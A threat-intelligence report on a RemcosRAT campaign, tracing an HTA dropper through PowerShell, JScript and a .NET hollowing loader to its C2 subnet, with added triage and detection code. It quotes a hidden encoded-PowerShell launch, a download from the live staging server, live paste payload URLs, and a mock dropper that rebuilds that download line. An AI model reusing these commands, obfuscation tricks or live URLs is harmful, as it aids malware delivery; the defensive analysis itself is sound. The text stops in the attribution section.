RemcosRAT "SkyLNK" Campaign: Five C2 Listeners, One Subnet, and an Operator Who Left the Directory Listing On
TL;DR: A RemcosRAT 7.2.0 Pro campaign -- tagged "SkyLNK" in the malware config -- was discovered through an HTA dropper (goodwill.hta) uploaded to MalwareBazaar on March 10, 2026. What looked like a single-sample Remcos deployment turned into a full infrastructure cluster: 7 C2 servers across 8 IPs packed into a single ColoCrossing/HostPapa /24 subnet in Buffalo, New York, with 5 concurrent Remcos listeners on one host sharing identical TLS certificates. The staging server at 96.44.159.218 is running a default XAMPP installation with open directory listings that exposed a second, previously unreported HTA campaign. The operator uses paste services for payload hosting, a reused .NET process hollowing loader that has been public since late February, and DuckDNS for C2 resolution. A Portuguese-language comment buried in the JavaScript stage -- // janela oculta ("hidden window") -- points to a Brazilian or Portuguese-speaking operator running what appears to be a credential theft and surveillance operation. Every staging URL was still live at the time of analysis.
One HTA, Seven C2 Servers
This investigation began with a routine MalwareBazaar submission: an HTA file called goodwill.hta, uploaded by researcher pr0xylife on March 10, 2026, from a Danish origin. HTA droppers are a well-worn initial access technique -- they execute as trusted HTML applications in mshta.exe, bypassing most file-type restrictions. Remcos is a well-worn RAT. Neither fact alone warrants a deep investigation.
But pulling the first thread -- the staging URL embedded in the HTA's decoded PowerShell -- led to an exposed XAMPP server with directory listings enabled, which led to a second unreported campaign, which led to a paste service infrastructure chain, which led to seven C2 servers crammed into a single /24 subnet. The operator built a small empire in one network block and then left the front door open.
The question this report answers is not "what does RemcosRAT do" -- that is thoroughly documented. The question is: how much infrastructure can you map from a single HTA file when the operator makes enough mistakes?
The answer, in this case, is all of it.
The Attack Chain: Five Stages, Four Languages
The kill chain moves through five distinct stages, each using a different scripting or runtime environment. This is not sophistication for its own sake -- it is defense evasion through diversity. Each transition between languages forces defenders to switch analysis tools, and each stage introduces its own obfuscation layer.
[Email/Web Delivery]
|
v
goodwill.hta (VBScript + Base64)
|
v
cmd.exe /C powershell -ec [UTF-16LE encoded command]
|
v
WGET http://96.44.159.218/220/seethebesttimeforeverythingtolearn.js
--> Saved to %APPDATA%\ethebesttimeforeverythingtoleae.js
|
v
Win32_Process.Create() --> powershell [deobfuscated]
|
v
Downloads .NET PE from pastefy.app / pastes.io
Downloads encrypted Remcos payload from pastes.io
|
v
Reflective .NET assembly load (DomainLoader)
Process hollowing into Msbuild.exe (x86)
|
v
RemcosRAT 7.2.0 Pro ("SkyLNK" botnet)
C2: goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646
Five stages. VBScript to PowerShell to JavaScript to PowerShell to .NET to native Remcos. Each transition is a potential detection opportunity -- and each one is a place where lazy analysis might stop.
Stage 1: The HTA Dropper
The HTA file is 46KB, which is large for what is essentially a launcher. Most of that size comes from obfuscation padding.
| Attribute | Value |
|---|---|
| SHA-256 | ed925501e749cdc073143ed948ec8a93c6b6a4b76304d9c6a76c6faabc8d048e |
| MD5 | faeeeb063ff4d8bbfff9a1fae1b71ca8 |
| SHA-1 | 7c66dcd951d4795fc8aae773f55aec385cfd1c7e |
| Size | 46,681 bytes |
| Type | HTML Application (HTA) |
| Reporter | pr0xylife |
| First Seen | 2026-03-10 10:06:29 UTC |
| Origin | DK (Denmark) |
The obfuscation is multi-layered but not particularly novel. It relies on six techniques working together to defeat static analysis:
- Massive whitespace padding -- 200+ spaces inserted between VBScript tokens, bloating the file and breaking signature-based detection that relies on byte-level patterns
- Random-case keywords -- `fUncTION`, `cReATEoBJect`, `bAsE64` -- defeating case-sensitive string matching (VBScript itself is case-insensitive, so the script still runs)
- Long random variable names -- 200+ character identifiers that make manual analysis tedious
- Base64-encoded COM object names -- `WSCRipt.SHell` and `%comsPec%` are decoded at runtime through `MSXML2.DOMDocument.3.0`
- UTF-16LE encoded PowerShell -- the `-ec` (EncodedCommand) flag takes a base64 string that decodes to UTF-16LE, adding another encoding layer
- IE8 compatibility directive -- `X-UA-Compatible: IE=EmulateIE8` forces legacy rendering, potentially affecting how some security tools parse the document
When you strip away the obfuscation, the execution flow is straightforward:
1. Create MSXML2.DOMDocument.3.0 (base64 decoder)
2. Create WScript.Shell via decoded base64
3. Expand %comspec% --> cmd.exe
4. Execute: cmd.exe /C powershell -EX bypass -noP -W 1 -ec [base64] (ExecutionPolicy Bypass, NoProfile, WindowStyle 1 = Hidden, EncodedCommand)
5. Download seethebesttimeforeverythingtolearn.js from staging server
6. Save to %APPDATA%\ethebesttimeforeverythingtoleae.js
7. Execute the JS file
Note that the saved filename is not the source filename: ethebesttimeforeverythingtoleae.js drops the leading "se" and the "rn" of "learn" compared with seethebesttimeforeverythingtolearn.js. Whether a typo or deliberate, it is a stable string that becomes a reliable behavioral indicator -- hunt for this exact filename under %APPDATA% across your endpoint telemetry.
Stage 2: The JavaScript Loader and a Portuguese Comment
The downloaded JavaScript file is where the investigation gets interesting from an attribution perspective.
| Attribute | Value |
|---|---|
| SHA-256 | 1b9791c5c75b7eb0c7510c42c6381f4fbfc40539c3afaab192d0ee65ab591d28 |
| Size | 33,794 bytes |
| Type | JScript (Windows Script Host) |
The obfuscation here is string-based rather than encoding-based. The entire payload is built through 600+ concatenation operations, with the junk delimiter FSfdbFokAmoohj inserted throughout the assembled string. At execution time, the script calls .split("FSfdbFokAmoohj").join("") to strip the delimiter and produce clean code. Dead code -- unused variables, meaningless arithmetic operations -- is scattered throughout as additional noise.
But buried in this obfuscated JavaScript, probably left in by accident, is a single comment in Portuguese:
// janela oculta
"Hidden window." A description of what the next line does -- launch a process with ShowWindow = 0 via WMI's Win32_Process.Create(). This is the kind of artifact that survives because developers comment their code during development and forget to strip comments before deployment. It is a small thing, but it narrows the operator's likely origin to the Lusophone world, and combined with other indicators -- the grammatically awkward English in the DuckDNS domain, the filename typos -- Brazilian Portuguese is the most likely first language.
The JavaScript stage uses WMI to launch PowerShell with yet another base64-encoded UTF-16LE payload, this time with a hidden window flag so that no console is visible to the user. Because Win32_Process.Create runs through the WMI provider host, the resulting powershell.exe is parented by WmiPrvSE.exe rather than by WScript.exe; parent-child hunts that expect WScript.exe --> powershell.exe miss this hop, so look for WmiPrvSE.exe spawning an encoded PowerShell command instead.
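As an added example (not tooling from the original report), the following Python triages both the Stage 1 HTA and the Stage 2 JScript described above: it collapses the whitespace padding, decodes the base64 COM ProgIDs, decodes the `-ec` UTF-16LE PowerShell, rebuilds the JScript's concatenated string by stripping the FSfdbFokAmoohj delimiter, and pulls out comments and URLs. The two inputs are constructed to mimic the obfuscation the report describes; they are not the real goodwill.hta or Stage 2 loader, and the PowerShell they carry is an assumed stand-in.

```python
"""Static triage for the Stage 1 HTA and Stage 2 JScript obfuscation.

Added example: this is not tooling from the original report. The two inputs
below are constructed to mimic the tricks the report describes (whitespace
padding, random-case VBScript, base64-encoded COM ProgIDs, a powershell -ec
UTF-16LE payload, and the JScript junk delimiter FSfdbFokAmoohj). They are
not goodwill.hta or seethebesttimeforeverythingtolearn.js.
"""
import base64
import re
import string
from typing import Optional

JS_DELIMITER = "FSfdbFokAmoohj"      # junk delimiter named in the report
PRINTABLE = set(string.printable)
ENCODED_FLAG = re.compile(r"-(?:ec|e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def normalize_vbscript(text: str) -> str:
    """Collapse padding runs and lowercase tokens so plain string matching works."""
    return re.sub(r"[ \t]{2,}", " ", text).lower()


def max_space_run(text: str) -> int:
    """Longest run of spaces; 200+ is the padding heuristic the report suggests for YARA."""
    return max((len(m) for m in re.findall(r" +", text)), default=0)


def decode_base64_literals(text: str) -> list:
    """Decode quoted base64 literals that yield printable ASCII (the hidden COM names)."""
    found = []
    for lit in re.findall(r'"([A-Za-z0-9+/]{8,}={0,2})"', text):
        try:
            s = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if set(s) <= PRINTABLE:
            found.append(s)
    return found


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a powershell -ec/-EncodedCommand argument: base64 of UTF-16LE text."""
    m = ENCODED_FLAG.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def rebuild_js_string(js: str, delimiter: str = JS_DELIMITER) -> str:
    """Join every double-quoted literal in source order and drop the delimiter,
    which is what the script's own .split(delimiter).join("") does at runtime."""
    return "".join(re.findall(r'"((?:[^"\\]|\\.)*)"', js)).replace(delimiter, "")


def extract_urls(text: str) -> list:
    return re.findall(r"https?://[^\s'\"]+", text)


def triage_hta(hta: str) -> dict:
    ps = decode_encoded_command(hta)
    return {
        "padding_run": max_space_run(hta),
        "uses_msxml_decoder": "msxml2.domdocument" in normalize_vbscript(hta),
        "com_objects": decode_base64_literals(hta),
        "powershell": ps,
        "urls": extract_urls(ps or ""),
    }


def triage_js(js: str) -> dict:
    joined = rebuild_js_string(js)
    return {
        "comments": re.findall(r"//\s*(.*)", js),
        "launches_via_wmi": "win32_process" in joined.lower(),
        "powershell": decode_encoded_command(joined),
    }


def ps_encoded(script: str) -> str:
    """What an operator does to build the -ec argument."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# --- constructed samples (not the real campaign files) ---
STAGE1_PS = ("wget http://96.44.159.218/220/seethebesttimeforeverythingtolearn.js "
             "-OutFile $env:APPDATA\\ethebesttimeforeverythingtoleae.js")
PAD = " " * 220
SHELL_B64 = base64.b64encode(b"WSCRipt.SHell").decode("ascii")
COMSPEC_B64 = base64.b64encode(b"%comsPec%").decode("ascii")
STAGE1_EC = ps_encoded(STAGE1_PS)
SAMPLE_HTA = (
    '<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">\n'
    '<script language="VBScript">\n'
    f'fUncTION{PAD}dEcODe(s)\n'
    f'  Set x = cReATEoBJect("MSXML2.DOMDocument.3.0"){PAD}\n'
    'End Function\n'
    f'Set sh = CreateObject(dEcODe("{SHELL_B64}"))\n'
    f'sh.Run dEcODe("{COMSPEC_B64}") & " /C powershell -EX bypass -noP -W 1 -ec {STAGE1_EC}", 0\n'
    '</script>'
)
STAGE2_PS = "Start-Sleep -Seconds 3; [Net.ServicePointManager]::SecurityProtocol = 'Tls12'"
STAGE2_EC = ps_encoded(STAGE2_PS)
D = JS_DELIMITER
SAMPLE_JS = (
    f'var p = "{D}pow{D}ershell -ec " + "{D}{STAGE2_EC} {D}";\n'
    'var junk = 17 * 3 - 9;\n'
    '// janela oculta\n'
    f'var w = GetObject("{D}winmgmts:{D}").Get("Win{D}32_Process");\n'
)

if __name__ == "__main__":
    print(triage_hta(SAMPLE_HTA))
    print(triage_js(SAMPLE_JS))
```

Run it as a script to print both triage dictionaries. The same functions apply to the extracted text of the real samples, with one caveat: the literal regex only rebuilds double-quoted strings, so extend it if a later variant switches to single quotes.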
Stage 3: PowerShell and Paste Service Abuse
The decoded PowerShell from Stage 2 is where the actual payload retrieval happens. The script performs these actions in sequence:
- `Start-Sleep -Seconds 3` -- a short delay; three seconds is well under typical sandbox run times, so it adds little real evasion
- Forces TLS 1.2 via `[Net.ServicePointManager]::SecurityProtocol = Tls12`
- Defines a C# class called `DomainLoader` for reflective assembly loading (compiled at runtime via `Add-Type`)
- Downloads a .NET PE from paste services with failover logic (primary: yaso.su, fallback: pastefy.app)
- Downloads an encrypted Remcos payload from pastes.io
- Extracts base64 content between `<<BASE64_START>>` and `<<BASE64_END>>` markers
- Reflectively loads the .NET assembly and calls `myprogram.Homees.runss()`
- Passes parameters `($gg, '0', '', 'Msbuild', '0', 'x86')` -- specifying the process hollowing target and architecture
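An added example, not the operator's script, that models the Stage 3 retrieval offline: mirrors are tried in order, the base64 between the `<<BASE64_START>>` and `<<BASE64_END>>` markers is extracted, and the decoded bytes are checked for an MZ/PE header before anything would ever be handed to a reflective loader. The paste responses and the 68-byte PE stub are constructed stand-ins; the script never touches the network.

```python
"""Offline model of the Stage 3 retrieval: walk the paste mirrors in order,
pull the base64 between <<BASE64_START>> and <<BASE64_END>>, and check the
result is a PE before it would be handed to a reflective loader.

Added example, not the operator's PowerShell. Nothing here touches the
network: FAKE_RESPONSES is a constructed stand-in for the paste services,
and STUB_PE is a 68-byte MZ/PE header with no code in it.
"""
import base64
import hashlib
import re
import struct
from typing import Callable, Optional, Tuple

START, END = "<<BASE64_START>>", "<<BASE64_END>>"
MARKERS = re.compile(re.escape(START) + r"(.*?)" + re.escape(END), re.S)


def extract_marked_base64(body: str) -> Optional[bytes]:
    """Return the decoded bytes between the markers, tolerating line wrapping."""
    m = MARKERS.search(body)
    if not m:
        return None
    try:
        return base64.b64decode("".join(m.group(1).split()), validate=True)
    except ValueError:
        return None


def is_pe(blob: bytes) -> bool:
    """MZ header plus a PE signature at e_lfanew; enough to reject HTML error pages."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def fetch_with_failover(urls, fetch: Callable[[str], Tuple[int, str]]):
    """Try mirrors in order, as the loader does; return (blob, source, reasons_skipped)."""
    skipped = []
    for url in urls:
        status, body = fetch(url)
        if status != 200:
            skipped.append((url, f"http {status}"))
            continue
        blob = extract_marked_base64(body)
        if blob is None:
            skipped.append((url, "no marker block"))
            continue
        return blob, url, skipped
    return None, None, skipped


def triage_retrieval(urls, fetch) -> dict:
    """What a defender wants from a replay: which mirror answered, and the hash to pivot on."""
    blob, source, skipped = fetch_with_failover(urls, fetch)
    return {
        "source": source,
        "skipped": skipped,
        "size": len(blob) if blob else 0,
        "is_pe": is_pe(blob) if blob else False,
        "sha256": hashlib.sha256(blob).hexdigest() if blob else None,
    }


# --- constructed stand-ins (no network access) ---
def make_stub_pe() -> bytes:
    hdr = bytearray(0x44)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew: PE signature right after the DOS header
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr)


STUB_PE = make_stub_pe()


def wrap_in_markers(blob: bytes, width: int = 40) -> str:
    """Mimic a paste body: preamble, then wrapped base64 between the markers."""
    b64 = base64.b64encode(blob).decode("ascii")
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    return "some paste preamble\n" + START + "\n" + "\n".join(lines) + "\n" + END + "\n"


PRIMARY = "https://yaso.su/raw/UpxC8OJX"
FALLBACK = "https://pastefy.app/sLC7Jpkp/raw"
FAKE_RESPONSES = {
    PRIMARY: (403, "<html>Forbidden</html>"),     # the report saw the primary dead with a 403
    FALLBACK: (200, wrap_in_markers(STUB_PE)),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    return FAKE_RESPONSES.get(url, (404, ""))


if __name__ == "__main__":
    print(triage_retrieval([PRIMARY, FALLBACK], fake_fetch))
```

Swap `fake_fetch` for a real HTTP client from an isolated analysis host and the same code replays the operator's failover order; the `skipped` list records which mirror died and why, and the SHA-256 is the value to search on MalwareBazaar.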
The paste service infrastructure is worth examining in detail because it reveals the operator's hosting strategy:
| Service | URL | Content | Status |
|---|---|---|---|
| yaso[.]su | /raw/UpxC8OJX | .NET loader PE (base64 with markers) | DEAD (403) |
| pastefy[.]app | /sLC7Jpkp/raw | .NET loader PE (base64 with markers) | LIVE |
| pastes[.]io | /raw/lE4qJRgR | Encrypted Remcos payload (706KB) | LIVE |
The failover from yaso.su to pastefy.app is significant: the operator planned for paste takedowns and built redundancy into the download chain, and the primary is now dead. A 403 is consistent with a takedown, though it can also be an anti-bot or geo block, so confirm from a second vantage point before recording the mirror as removed. The encrypted Remcos payload on pastes.io is 706KB -- large enough that it would stand out in paste service abuse monitoring, but paste services generally do not inspect content for malware.
This is a pattern worth watching: paste services as malware CDNs. They offer free hosting, no registration verification, raw content endpoints that return clean binary data, and HTTPS encryption that prevents network-layer inspection. For an operator, the only downside is the audit trail -- and this particular operator does not seem to care much about audit trails.
Stage 4: The .NET Process Hollower
The .NET loader has been public for two weeks. It was first submitted to MalwareBazaar on February 26, 2026, by researcher James_inthe_box, and has been analyzed in CAPE Sandbox.
| Attribute | Value |
|---|---|
| SHA-256 | bd6b60ce34d8fa3f2b9d032b49aac5b47f868b09ab24ccbd9c7168e5bfc8e963 |
| MD5 | 13743b70ab1afec1d36b6b3d929cd44c |
| Size | 50,688 bytes |
| Type | PE32+ executable (GUI) x86-64 Mono/.NET assembly |
| Framework | .NET Framework 4.8 |
| First Seen | 2026-02-26 13:54:40 UTC |
| CAPE Analysis | https://www.capesandbox.com/analysis/54704/ |
The loader performs textbook process hollowing using the standard Windows API sequence (canonical API names; the loader wraps them under the abbreviated names listed below):
CreateProcess (suspended) --> GetThreadContext --> NtUnmapViewOfSection --> VirtualAllocEx
--> WriteProcessMemory --> SetThreadContext --> ResumeThread
What is notable is the completeness of the implementation. The extracted API strings show support for both 32-bit and 64-bit injection:
VirtualAlloc32/64, CreateProc32/64, ResumeThread32/64, WriteMem32/64, ReadMem32, UnmapView32/64, GetCtx32/64, SetCtx32/64, GetCtxWow32, VirtualProtect64, CloseHandle64, LoadLibraryA, GetProc (dynamic API resolution)
The Wow32 context variant is the piece that matters here: a 64-bit host process (the PowerShell that reflectively loaded the assembly) can only read and set the context of a 32-bit target thread through the Wow64 context functions, which is exactly what hollowing the x86 Msbuild.exe from 64-bit PowerShell requires.
The hollowing target is Msbuild.exe -- Microsoft Build Engine -- running in x86 mode. Like Aspnet_compiler.exe and RegAsm.exe (common choices in other campaigns), Msbuild is a legitimate Microsoft binary that lives in the .NET Framework directory. It is a well-known LOLBin: a signed Microsoft executable that security products are reluctant to flag, making it an ideal host for injected malware.
The loader also includes registry persistence capabilities targeting CurrentUser keys, ensuring the RAT survives reboots.
Stage 5: RemcosRAT 7.2.0 Pro -- The SkyLNK Botnet
The final payload is RemcosRAT version 7.2.0 Pro -- the commercial, licensed variant sold by Breaking Security (a company that markets Remcos as a "remote administration tool" while it is overwhelmingly used for cybercrime). The Triage sandbox run extracted the full configuration:
| Setting | Value |
|---|---|
| Version | 7.2.0 Pro |
| Botnet ID | SkyLNK |
| C2 Server | goodpeopleswhitbrigheartwinthisindustryi[.]duckdns[.]org:14646 |
| Mutex | Rmc-E3G25N |
| Copy File | remcos.exe |
| Copy Folder | Remcos |
| Connect Delay | 0 seconds |
| Connect Interval | 1 second |
| Keylog File | logs.dat |
| Keylog Folder | remcos |
| Screenshot Folder | Screenshots |
| Screenshot Path | %AppData% |
| Screenshot Interval | 10 seconds |
| Audio Record Folder | MicRecords |
| Audio Record Duration | 5 seconds |
The configuration tells a story about the operator's intentions. A 10-second screenshot interval is aggressive surveillance -- that is 360 screenshots per hour, generating significant data volume. Combined with 5-second audio recording clips and continuous keylogging, this is not a smash-and-grab credential stealer. This is persistent surveillance infrastructure designed to capture everything a victim does on their machine.
The connect interval of 1 second with zero delay means the RAT begins beaconing immediately after injection. There is no attempt to blend into normal traffic patterns or use jitter -- the operator prioritizes reliability over stealth at the C2 communication layer.
The Triage sandbox captured the full process execution tree, which maps every stage of the kill chain to observable process relationships:
mshta.exe (5104)
--> cmd.exe (816)
--> powershell.exe (4736) [SeDebugPrivilege]
--> WScript.exe (2440) [JS execution]
--> csc.exe (4140) [DomainLoader compilation]
--> cvtres.exe (2424)
--> Msbuild.exe (3920) [Process hollowed with Remcos]
--> userinit.exe (2460) [Nirsoft credential harvester]
--> userinit.exe (4752) [Nirsoft credential harvester]
--> userinit.exe (4416) [Nirsoft credential harvester]
Note the csc.exe invocation: the PowerShell stage compiles the DomainLoader C# class at runtime through Add-Type, which shells out to the .NET compiler service and in turn spawns cvtres.exe (the resource-to-object converter). This is a detectable artifact: csc.exe spawned as a child of powershell.exe is abnormal in most enterprise environments and should be monitored. Legitimate administrative scripts do use Add-Type with inline C#, so tune on the calling script and the response file csc reads from %TEMP% rather than alerting on the parent-child pair alone.
The three userinit.exe child processes of the hollowed Msbuild.exe are Nirsoft credential harvesting tools, deployed by Remcos to extract passwords from browsers, email clients, and other applications. This is standard Remcos behavior -- it ships with embedded Nirsoft utilities and spawns them as needed for credential collection.
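Added example, not a detection set from the report: the rules below run over constructed Sysmon-style process-creation records that mirror the Triage tree, and flag the mshta --> cmd --> powershell chain, csc.exe under powershell.exe, userinit.exe under Msbuild.exe, and an encoded PowerShell command parented by WmiPrvSE.exe. That last parent is an assumption about how the WMI-launched stage appears in real telemetry (Win32_Process.Create runs under the WMI provider host), which the flattened Triage tree does not show; the pids are reused from the report where it lists them and invented otherwise.

```python
"""Process-tree detections for the SkyLNK chain, run over constructed
Sysmon-style process-creation records.

Added example, not a rule set from the report. EVENTS is made up to mirror
the Triage tree, plus one benign PowerShell launch as a control. One
deliberate difference from the flattened tree in the report: the PowerShell
that the JScript stage starts through Win32_Process.Create is parented by
WmiPrvSE.exe, which is how WMI-created processes appear in telemetry.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")
ENCODED_FLAG = re.compile(r"\s-(?:ec|e|enc|encodedcommand)\s", re.I)


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def chain_for(index: dict, pid: int, depth: int = 8) -> list:
    """Image names from the process up through its ancestors (self first)."""
    names = []
    while pid in index and len(names) < depth:
        proc = index[pid]
        names.append(basename(proc.image))
        pid = proc.ppid
    return names


# Each rule sees the ancestry chain (self first) and the event itself.
RULES = [
    ("hta_to_powershell",
     lambda c, e: c[:3] == ["powershell.exe", "cmd.exe", "mshta.exe"]),
    ("wmi_launched_encoded_powershell",
     lambda c, e: c[:2] == ["powershell.exe", "wmiprvse.exe"]
     and bool(ENCODED_FLAG.search(e.cmdline))),
    ("powershell_runtime_csc",
     lambda c, e: c[:2] == ["csc.exe", "powershell.exe"]),
    ("msbuild_spawns_userinit",
     lambda c, e: c[:2] == ["userinit.exe", "msbuild.exe"]),
]


def evaluate(events) -> list:
    """Return (rule_name, pid) for every event that matches a rule, in event order."""
    index = {e.pid: e for e in events}
    hits = []
    for e in events:
        chain = chain_for(index, e.pid)
        for name, pred in RULES:
            if pred(chain, e):
                hits.append((name, e.pid))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NET64 = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
EVENTS = [  # constructed; not a real log export
    Proc(5104, 1000, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\v\Downloads\goodwill.hta"),
    Proc(816, 5104, r"C:\Windows\System32\cmd.exe", "cmd.exe /C powershell -EX bypass -noP -W 1 -ec AAAA"),
    Proc(4736, 816, PS, "powershell -EX bypass -noP -W 1 -ec AAAA"),
    Proc(2440, 4736, r"C:\Windows\System32\WScript.exe",
         r"wscript.exe C:\Users\v\AppData\Roaming\ethebesttimeforeverythingtoleae.js"),
    Proc(900, 700, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe -secured -Embedding"),
    Proc(6000, 900, PS, "powershell -ec BBBB"),   # launched via Win32_Process.Create
    Proc(4140, 6000, NET64 + r"\csc.exe",
         "csc.exe /noconfig /fullpaths @C:\\Users\\v\\AppData\\Local\\Temp\\x.cmdline"),
    Proc(2424, 4140, NET64 + r"\cvtres.exe", "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    Proc(3920, 6000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe", "Msbuild.exe"),
    Proc(2460, 3920, r"C:\Windows\System32\userinit.exe", "userinit.exe"),
    Proc(1234, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(2222, 1234, PS, "powershell -NoProfile -File C:\\Scripts\\Get-Inventory.ps1"),
]

if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:36} pid={pid}")
```

The ancestry chain is built from the pid/ppid index rather than from the immediate parent only, so the mshta rule still fires when an extra cmd.exe or conhost hop is inserted; the benign inventory script (a PowerShell launched from explorer.exe with -File) produces no hit.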
C2 communication runs over TLS on port 14646. Triage recorded 509,865 bytes received and 12,827 bytes sent across 203 packets. Read from the victim's side, that is roughly 510 KB inbound against 13 KB outbound in a short sandbox run: the direction you would expect while the server sends commands and configuration to a fresh implant, not the profile of sustained exfiltration. A live victim under 10-second screenshots and continuous keylogging would invert that ratio quickly, which is the traffic shape to hunt for on long-lived connections to this port.
Infrastructure Analysis: A Whole Subnet
This is where the investigation goes from "another Remcos campaign" to "an operator running a small botnet farm out of a single network block."
Starting from the C2 domain resolved by the Remcos configuration, we mapped the entire 96.44.159.0/24 subnet and found seven C2 servers, a staging server, and an XWorm deployment that may belong to the same actor.
The Network Map
| IP | Ports | Services | Role | Status |
|---|---|---|---|---|
| 96.44.159.218 | 80, 135, 443, 445, 3389 | Apache/XAMPP Win64, RDP | Staging / Payload Delivery | LIVE |
| 96.44.159.137 | 135, 445, 3389, 14641, 14642, 14645-14647 | Windows, Remcos C2 x5 | Primary C2 Server | LIVE |
| 96.44.159.225 | 445, 3389 | Windows, Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.222 | 445, 5357 | Windows, Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.151 | 445 | Windows, Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.165 | -- | Remcos C2 | Secondary C2 | LIVE |
| 96.44.159.154 | -- | Remcos (port 1212) | Older C2 (January) | UNKNOWN |
| 96.44.159.208 | -- | XWorm (port 4242) | XWorm C2 | UNKNOWN |
All eight IPs are in the same /24 block, all hosted by HostPapa (operating on ColoCrossing infrastructure) in Buffalo, New York. Every server that exposes SMB (port 445) or RDP (port 3389) is running Windows. This is a single operator renting a block of Windows VPS instances from the same provider and deploying RAT C2 servers across them.
The primary C2 host at 96.44.159.137 is running five concurrent Remcos listeners on ports 14641, 14642, 14645, 14646, and 14647. The SkyLNK campaign we are tracking uses port 14646 -- but four other listeners are running alongside it. Five listeners is an upper bound on the number of campaigns or victim groups managed through this box, not a confirmed count: a single Remcos build can carry several host:port entries as fallbacks, so some of these ports may serve one victim group.
TLS Certificate Clustering
TLS certificate analysis reveals the organizational structure of these C2 servers. All five listeners on .137 share a single certificate:
| Certificate Serial | Hosts | Interpretation |
|---|---|---|
| 620F885FCCD540A59B778B08716661D1 | .137 (ports 14641, 14642, 14645-14647) | Single Remcos instance, 5 listeners |
| 4B615D8D3F62857406372B7BB0C96304 | .225, .151 | Shared instance or cloned config |
| 4DCC27375E5A83560A4E18FBEBBE055C | .222 | Independent instance |
| 6024F0D0D15B0FBF41D66C1235FD9A29 | .165 | Independent instance |
All certificates share the same characteristics: ECDSA P-256, validity from 1970-01-01 to 2090-12-31, empty subject and issuer fields. This is the Remcos default TLS configuration -- the operator did not bother to customize certificates. That default certificate profile is itself a fingerprinting opportunity: any TLS server presenting an ECDSA P-256 certificate with epoch-start validity and blank subject fields on a high-numbered port is almost certainly Remcos.
The shared certificate between .225 and .151 suggests either a cloned Remcos installation (the operator imaged one VM and deployed it to a second IP) or a single Remcos instance listening on two interfaces. Either way, these two hosts are operationally linked.
The Staging Server: XAMPP With the Door Open
The staging server at 96.44.159.218 is the crown jewel of this operator's OPSEC failures.
It is running XAMPP 8.1.25 (Apache 2.4.58, OpenSSL 3.1.3, PHP 8.1.25) on Windows with the default dashboard still accessible at the root URL. phpMyAdmin is present but returns 403. The HTTPS certificate is the default XAMPP self-signed cert with CN=localhost, expired in 2019. This is a stock XAMPP installation with minimal hardening.
More critically, the operator organized campaigns into numbered directories -- /220/ and /221/ -- but failed to disable directory listings on /221/. The result:
Directory listing of /221/ (LIVE as of 2026-03-10 12:25 UTC):
nicewalkingwithbestthings.js 33K 2026-03-10 00:55
ss/stlegoodfornewhingsforme.hta 46K 2026-03-10 00:56
This exposed a second, previously unreported HTA campaign (stlegoodfornewhingsforme.hta, SHA256: 77981d8f...) and its companion JavaScript loader. The /220/ directory -- serving the SkyLNK campaign we initially investigated -- does not have directory listing enabled, but its payloads are directly accessible by URL. The operator remembered to lock one door but not the other.
The timestamps are telling: both /221/ payloads were uploaded at 00:55-00:56 UTC on March 10, just hours before the /220/ campaign's HTA was distributed. The operator was actively building and staging parallel campaigns overnight.
What Was Found vs. What Was Known
Prior to this investigation, the public record for this campaign consisted of a single MalwareBazaar sample and a couple of ThreatFox IOC entries. Here is what our analysis added:
| Aspect | Prior Reporting | Our Findings |
|---|---|---|
| C2 Infrastructure | 1 domain, 1 port (ThreatFox) | 5 active listeners on primary C2, 7 C2 servers across subnet |
| Staging Infrastructure | 1 URL (DocGuard) | 2 campaign directories, open directory listing, exposed XAMPP |
| Campaign Scope | 1 HTA sample | 2 HTA campaigns running simultaneously from same server |
| Loader Reuse | Known since Feb 26 | Confirmed same loader across both campaigns |
| Attribution | Unknown | Portuguese-speaking operator, likely Brazilian |
| Malware Families | Remcos only | Remcos + XWorm C2 in same subnet |
| TLS Fingerprints | None | 4 distinct certificate serials mapped across 5 C2 hosts |
| Paste Infrastructure | None | 3 paste services identified (1 dead, 2 live) |
The jump from "1 domain, 1 port" to "7 C2 servers, 5 listeners, 2 campaigns, 3 paste services" illustrates why infrastructure pivoting matters. Every IOC is a node in a graph. The question is always whether you stop at the first node or follow the edges.
Threat Actor Profile: Portuguese-Speaking, Medium Sophistication, Bad OPSEC
Attribution Assessment
- Confidence: MEDIUM
- Language: Portuguese (Brazilian Portuguese likely)
- Motivation: Financial -- credential theft, surveillance-as-a-service
The evidence for Portuguese-language attribution rests on multiple converging indicators:
- The `// janela oculta` comment in the JavaScript payload -- Portuguese for "hidden window" and almost certainly a development artifact that was not stripped before deployment
- The DuckDNS domain (goodpeopleswhitbrigheartwinthisindustryi) -- the long, grammatically awkward English phrasing is consistent with English as a second language, and the aspirational tone ("good peoples with bright heart win this industry") matches social engineering language commonly observed in Brazilian cybercrime operations
